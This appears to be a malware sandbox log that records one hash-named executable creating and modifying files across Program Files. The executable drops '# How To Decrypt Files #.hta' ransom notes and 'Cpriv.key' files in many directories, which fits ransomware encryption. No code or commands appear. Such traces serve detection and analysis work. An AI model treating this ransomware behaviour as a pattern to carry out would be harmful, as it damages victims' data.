de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00423_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296277.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FRAR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18219_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21348_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090779.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_few-showers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\TableTextService\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0251925.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OMML2MML.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Document Parts\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Tasks.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL110.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUB6INTL.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02435_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\DELETE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\SAMPLES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\SmallLogoDev.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\203x8subpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\RESENDS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\WidevineCdm\manifest.json de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21327_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Document Parts\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187835.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21481_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_matte2.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\zh-CN.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA6\VBE6EXT.OLB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01748_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\POSTCD98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-imageMask.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102594.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Teal.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SONORA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME49.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADVTEL.DIC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Adjacency.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR1F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\msado25.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\MedianMergeLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\Accessories\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR51F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsColorChart.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00426_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Details.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00296_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Premium.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00557_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00177_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\jfr\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01219_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01545_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\OFFICE10.MMW de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18226_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Elemental.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232171.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304875.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png 